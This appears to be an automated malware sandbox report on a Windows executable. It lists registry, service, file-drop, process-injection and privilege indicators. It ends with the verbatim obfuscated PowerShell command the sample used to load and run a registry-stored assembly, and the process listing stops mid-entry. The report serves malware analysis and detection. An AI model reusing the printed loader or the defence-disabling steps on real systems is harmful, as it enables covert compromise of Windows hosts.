3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398

Analysis

max time kernel
265s
max time network
180s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
01-09-2022 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
Size

2.8MB
MD5

3acdc339d7a5d2758540325f7ad5055f
SHA1

d2d76492a236516d5c56eb5ca948f3d1fc0c77bc
SHA256

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398
SHA512

ba7323db77ab19f659697276fe763201e0d5f57d833c881c2e33286a75f4c117d14089aab5b871d2d9f8fb298f7bc3993b6ca75966aed7626336722cd3e30304
SSDEEP

49152:yjpxVhHNgD3GXZ5jrpaWeC1SQGi5kGKptdJ6qgedSuDcbGSDz2/Zm:ytfhH6D3IZJrpaLCrGi5rKp3JNPhiqBm

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 4676 created 556	4676	powershell.EXE	winlogon.exe
PID 4348 created 3872	4348	svchost.exe	DllHost.exe
PID 4348 created 3680	4348	svchost.exe	DllHost.exe
PID 4532 created 556	4532	powershell.EXE	winlogon.exe
PID 4532 created 556	4532	powershell.EXE	winlogon.exe
PID 4532 created 556	4532	powershell.EXE	winlogon.exe
PID 4532 created 556	4532	powershell.EXE	winlogon.exe

Drops file in Drivers directory 1 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

Executes dropped EXE 1 IoCs

Processes:

conhost.exe

pid process

3700 conhost.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4296 takeown.exe
4640 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4296 takeown.exe
4640 icacls.exe

pid	process
3700	conhost.exe

pid	process
4296	takeown.exe
4640	icacls.exe

pid	process
4296	takeown.exe
4640	icacls.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEOfficeClickToRun.exepowershell.EXE

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 3 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 2708 set thread context of 3700	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe
PID 4676 set thread context of 3744	4676	powershell.EXE	dllhost.exe
PID 4532 set thread context of 912	4532	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

description	ioc	process
File created	C:\Program Files\Platform\Defender\update.exe	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1904 sc.exe
4896 sc.exe
5080 sc.exe
3784 sc.exe
2956 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4932 3680 WerFault.exe DllHost.exe
3908 3872 WerFault.exe DllHost.exe

pid	process
1904	sc.exe
4896	sc.exe
5080	sc.exe
3784	sc.exe
2956	sc.exe

pid	pid_target	process	target process
4932	3680	WerFault.exe	DllHost.exe
3908	3872	WerFault.exe	DllHost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2AE3B6FE-EF01-4BB2-9F12-7789B63F90C4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1662077922"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

416 reg.exe
992 reg.exe
3516 reg.exe
4816 reg.exe
4560 reg.exe
4472 reg.exe
4508 reg.exe
3948 reg.exe
4592 reg.exe

pid	process
416	reg.exe
992	reg.exe
3516	reg.exe
4816	reg.exe
4560	reg.exe
4472	reg.exe
4508	reg.exe
3948	reg.exe
4592	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exe

pid	process
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe
4676	powershell.EXE
4676	powershell.EXE
4676	powershell.EXE
4676	powershell.EXE
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
4532	powershell.EXE
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3744	dllhost.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe
3908	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3020 Explorer.EXE

pid	process
3020	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeIncreaseQuotaPrivilege	4728	powershell.exe
Token: SeSecurityPrivilege	4728	powershell.exe
Token: SeTakeOwnershipPrivilege	4728	powershell.exe
Token: SeLoadDriverPrivilege	4728	powershell.exe
Token: SeSystemProfilePrivilege	4728	powershell.exe
Token: SeSystemtimePrivilege	4728	powershell.exe
Token: SeProfSingleProcessPrivilege	4728	powershell.exe
Token: SeIncBasePriorityPrivilege	4728	powershell.exe
Token: SeCreatePagefilePrivilege	4728	powershell.exe
Token: SeBackupPrivilege	4728	powershell.exe
Token: SeRestorePrivilege	4728	powershell.exe
Token: SeShutdownPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeSystemEnvironmentPrivilege	4728	powershell.exe
Token: SeRemoteShutdownPrivilege	4728	powershell.exe
Token: SeUndockPrivilege	4728	powershell.exe
Token: SeManageVolumePrivilege	4728	powershell.exe
Token: 33	4728	powershell.exe
Token: 34	4728	powershell.exe
Token: 35	4728	powershell.exe
Token: 36	4728	powershell.exe
Token: SeShutdownPrivilege	1300	powercfg.exe
Token: SeCreatePagefilePrivilege	1300	powercfg.exe
Token: SeShutdownPrivilege	4912	powercfg.exe
Token: SeCreatePagefilePrivilege	4912	powercfg.exe
Token: SeShutdownPrivilege	4488	powercfg.exe
Token: SeCreatePagefilePrivilege	4488	powercfg.exe
Token: SeShutdownPrivilege	5072	powercfg.exe
Token: SeCreatePagefilePrivilege	5072	powercfg.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeTakeOwnershipPrivilege	4296	takeown.exe
Token: SeIncreaseQuotaPrivilege	4304	powershell.exe
Token: SeSecurityPrivilege	4304	powershell.exe
Token: SeTakeOwnershipPrivilege	4304	powershell.exe
Token: SeLoadDriverPrivilege	4304	powershell.exe
Token: SeSystemProfilePrivilege	4304	powershell.exe
Token: SeSystemtimePrivilege	4304	powershell.exe
Token: SeProfSingleProcessPrivilege	4304	powershell.exe
Token: SeIncBasePriorityPrivilege	4304	powershell.exe
Token: SeCreatePagefilePrivilege	4304	powershell.exe
Token: SeBackupPrivilege	4304	powershell.exe
Token: SeRestorePrivilege	4304	powershell.exe
Token: SeShutdownPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeSystemEnvironmentPrivilege	4304	powershell.exe
Token: SeRemoteShutdownPrivilege	4304	powershell.exe
Token: SeUndockPrivilege	4304	powershell.exe
Token: SeManageVolumePrivilege	4304	powershell.exe
Token: 33	4304	powershell.exe
Token: 34	4304	powershell.exe
Token: 35	4304	powershell.exe
Token: 36	4304	powershell.exe
Token: SeIncreaseQuotaPrivilege	4304	powershell.exe
Token: SeSecurityPrivilege	4304	powershell.exe
Token: SeTakeOwnershipPrivilege	4304	powershell.exe
Token: SeLoadDriverPrivilege	4304	powershell.exe
Token: SeSystemProfilePrivilege	4304	powershell.exe
Token: SeSystemtimePrivilege	4304	powershell.exe
Token: SeProfSingleProcessPrivilege	4304	powershell.exe
Token: SeIncBasePriorityPrivilege	4304	powershell.exe
Token: SeCreatePagefilePrivilege	4304	powershell.exe
Token: SeBackupPrivilege	4304	powershell.exe
Token: SeRestorePrivilege	4304	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

972 dwm.exe
972 dwm.exe

pid	process
972	dwm.exe
972	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2708 wrote to memory of 4728	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 2708 wrote to memory of 4728	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 2708 wrote to memory of 3476	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 2708 wrote to memory of 3476	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 2708 wrote to memory of 3488	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 2708 wrote to memory of 3488	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 3476 wrote to memory of 2956	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 2956	3476	cmd.exe	sc.exe
PID 3488 wrote to memory of 1300	3488	cmd.exe	powercfg.exe
PID 3488 wrote to memory of 1300	3488	cmd.exe	powercfg.exe
PID 2708 wrote to memory of 4304	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 2708 wrote to memory of 4304	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	powershell.exe
PID 3476 wrote to memory of 1904	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 1904	3476	cmd.exe	sc.exe
PID 3488 wrote to memory of 4912	3488	cmd.exe	powercfg.exe
PID 3488 wrote to memory of 4912	3488	cmd.exe	powercfg.exe
PID 3476 wrote to memory of 4896	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 4896	3476	cmd.exe	sc.exe
PID 3488 wrote to memory of 4488	3488	cmd.exe	powercfg.exe
PID 3488 wrote to memory of 4488	3488	cmd.exe	powercfg.exe
PID 3476 wrote to memory of 5080	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 5080	3476	cmd.exe	sc.exe
PID 3488 wrote to memory of 5072	3488	cmd.exe	powercfg.exe
PID 3488 wrote to memory of 5072	3488	cmd.exe	powercfg.exe
PID 3476 wrote to memory of 3784	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 3784	3476	cmd.exe	sc.exe
PID 3476 wrote to memory of 3516	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 3516	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4816	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4816	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 3948	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 3948	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4560	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4560	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4592	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4592	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4296	3476	cmd.exe	takeown.exe
PID 3476 wrote to memory of 4296	3476	cmd.exe	takeown.exe
PID 3476 wrote to memory of 4640	3476	cmd.exe	icacls.exe
PID 3476 wrote to memory of 4640	3476	cmd.exe	icacls.exe
PID 2708 wrote to memory of 3700	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe
PID 2708 wrote to memory of 3700	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe
PID 2708 wrote to memory of 3700	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	conhost.exe
PID 2708 wrote to memory of 1780	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 2708 wrote to memory of 1780	2708	3279de2990f4f99db2823d720e9bbfc306a0b9e18906e6cab714e2fedb6a5398.exe	cmd.exe
PID 1780 wrote to memory of 4684	1780	cmd.exe	choice.exe
PID 1780 wrote to memory of 4684	1780	cmd.exe	choice.exe
PID 3476 wrote to memory of 4472	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4472	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4508	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 4508	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 416	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 416	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 992	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 992	3476	cmd.exe	reg.exe
PID 3476 wrote to memory of 1540	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 1540	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 288	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 288	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 308	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 308	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 2140	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 2140	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 584	3476	cmd.exe	schtasks.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:632

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:556

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:972

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{42263ece-110b-40dc-b57b-01fbcec29494}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3744

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{eccc35b8-b3d3-4d13-9794-c9f0e653a092}
2⤵
PID:2156

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{eccc35b8-b3d3-4d13-9794-c9f0e653a092}
2⤵
PID:308

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{eccc35b8-b3d3-4d13-9794-c9f0e653a092}
2⤵
PID:2144

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{eccc35b8-b3d3-4d13-9794-c9f0e653a092}
2⤵
PID:912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:948

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
